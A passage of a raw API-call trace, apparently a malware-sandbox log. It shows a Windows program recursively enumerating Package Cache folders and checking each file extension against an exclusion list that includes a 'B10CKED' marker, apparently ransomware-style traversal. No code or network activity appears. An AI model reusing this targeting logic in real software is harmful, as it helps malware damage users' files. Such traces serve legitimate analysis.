Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0110.149] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.149] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\", cchLength=0x59 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\") returned 0x59 [0110.150] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0110.150] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.151] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\PATCH\\X86\\") returned 0x5d [0110.151] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*.*", lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0x1c8028 [0110.151] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0110.152] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0110.152] CharUpperBuffW (in: lpsz="msu", cchLength=0x3 | out: lpsz="MSU") returned 0x3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 3 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="MSU", cchCount2=3) returned 1 [0110.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="MSU", cchCount2=3) returned 2 [0110.155] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0110.155] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0110.156] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0110.156] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.156] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.156] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.156] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.156] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.156] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\") returned 0x4a [0110.156] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.169] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.169] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\D4036846864773E3D647F421DFE7F6CA536E307B\\PACKAGES\\") returned 0x53 [0110.169] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 